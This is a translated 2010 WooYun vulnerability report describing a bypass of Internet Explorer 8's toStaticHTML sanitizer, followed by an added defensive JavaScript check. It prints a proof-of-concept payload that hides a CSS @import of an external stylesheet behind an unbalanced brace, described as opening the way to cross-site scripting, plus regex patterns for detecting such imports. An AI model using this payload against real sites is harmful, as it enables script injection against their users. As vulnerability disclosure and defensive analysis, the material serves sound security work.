
Vulnerability Summary

Defect ID: wooyun-2010-0189

Title: IE8 toStaticHTML bypass vulnerability

Vendor: Microsoft

Author: 结界师

Submitted: 2010-08-13 11:01

Fixed: 2010-08-13 11:01

Published: 2010-08-13 11:01

Vulnerability type: design error / logic flaw

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2010-08-13: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2010-08-13: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

toStaticHTML is a new API Microsoft introduced in IE8, advertised as a solution to XSS:
http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-v-comprehensive-protection.aspx
<code>
Safer Mashups: HTML Sanitization
IE8 exposes a new method on the window object named toStaticHTML. When a string of HTML is passed to this function, any potentially executable script constructs are removed before the string is returned. Internally, this function is based on the same technologies as the server-side Microsoft Anti-Cross Site Scripting Library mentioned previously.
So, for example, you can use toStaticHTML to help ensure that HTML received from a postMessage call cannot execute script, but can take advantage of basic formatting:
document.attachEvent('onmessage', function(e) {
  if (e.domain == 'weather.example.com') {
    spnWeather.innerHTML = window.toStaticHTML(e.data);
  }
});
Calling:
window.toStaticHTML("This is some <b>HTML</b> with embedded script following... <script>alert('bang!');</script>!");
will return:
This is some <b>HTML</b> with embedded script following... !
</code>
80sec found a security flaw in it that allows the filter to be bypassed, so everything that relies on toStaticHTML remains vulnerable to XSS.

Detailed description:

Good intentions do not guarantee a good implementation. toStaticHTML is ultimately implemented as regex-based analysis of the input string, while the browser does the real parsing afterwards; any divergence between the two can lead to a bypass.
Flaws in Microsoft's regular expressions, combined with IE's own rather sloppy, non-standard parsing, make the bypass possible.

Proof of concept:

<script type="text/javascript">
function fuckie()
{
var szInput = document.shit.input.value;
var szStaticHTML = toStaticHTML(szInput);
ResultComment = szStaticHTML;
document.shit.output.value = ResultComment;
}
</script>
<form name="shit">
<textarea name='input' cols=40 rows=20>
</textarea>
<textarea name='output' cols=40 rows=20>
</textarea>
<input type=button value="fuck_me" name="fuck" onclick=fuckie();>
</form>

<style>
}@import url('//127.0.0.1/1.css');aaa
{;}
</style>
<div id="x">Fuck Ie</div>


This way 1.css gets imported, and from there you can XSS as much as you like.
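As an added defensive example (not part of the original report and not Microsoft's code), the snippet below shows the lesson a consumer of toStaticHTML should draw from the PoC: treat the sanitizer's output as untrusted and apply an independent second-stage check that is not confused by the unbalanced braces. The sanitizer is passed in as a parameter (a hypothetical interface so the code runs outside IE8), `passThroughSanitizer` is a constructed stand-in that reproduces only the behaviour the report demonstrates, and the sample input is adapted from the PoC above with constructed div text.

```javascript
// Added defensive example; not part of the original report and not Microsoft's code.
// The report's lesson: toStaticHTML filters with regular expressions while IE does
// the real parsing, so "static" output can still carry an @import that loads an
// external stylesheet. Defensive response: treat the sanitizer's output as untrusted
// and apply an independent second-stage check that the brace trick cannot fool.

// Matches whole <style ...>...</style> elements, any case, across newlines.
const STYLE_BLOCK = /<style\b[^>]*>([\s\S]*?)<\/style\s*>/gi;
// CSS tokens that fetch a remote resource; matched anywhere in a style body,
// with no attempt to parse CSS rules, so a stray "}" before @import changes nothing.
const EXTERNAL_CSS = /@import\b|url\s*\(/i;

// Collect the body of every <style> element in the markup.
function extractStyleBlocks(html) {
  const bodies = [];
  STYLE_BLOCK.lastIndex = 0;
  let m;
  while ((m = STYLE_BLOCK.exec(html)) !== null) {
    bodies.push(m[1]);
  }
  return bodies;
}

// True when any <style> body still references an external resource.
function hasExternalCss(html) {
  return extractStyleBlocks(html).some((body) => EXTERNAL_CSS.test(body));
}

// Hardened sanitize step. The platform sanitizer is passed in as a parameter
// (hypothetical interface, so this runs outside IE8); if its output still
// contains remote CSS, every <style> element is dropped. "Basic formatting",
// the use case the MSDN post describes, never needs <style> at all.
function sanitizeStrict(html, sanitizer) {
  const out = sanitizer(html);
  return hasExternalCss(out) ? out.replace(STYLE_BLOCK, '') : out;
}

// Constructed stand-in for toStaticHTML reproducing only the behaviour the
// report demonstrates: the <style> block with its @import survives untouched.
function passThroughSanitizer(html) {
  return html;
}

// Sample input adapted from the report's PoC (the div text is constructed).
const POC =
  "<style>\n}@import url('//127.0.0.1/1.css');aaa\n{;}\n</style>\n" +
  '<div id="x">test</div>';

console.log(hasExternalCss(POC));                       // true
console.log(sanitizeStrict(POC, passThroughSanitizer)); // only the <div> remains
```

The check deliberately does not try to parse CSS: any occurrence of `@import` or `url(` inside a style body is grounds for rejection, so the `}` placed in front of the `@import` in the PoC, which is what confuses the sanitizer's own rule parsing, gains nothing against it. For a formatting-only use case the simpler policy is to drop `<style>` elements unconditionally.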

Fix recommendation:

Patch it yourselves; this is not the only case :)

Copyright notice: when reposting, please credit the source: 结界师@乌云


Vulnerability Response

Vendor response:

Could not contact the vendor, or the vendor actively declined

Vulnerability Rank: 15 (WooYun rating)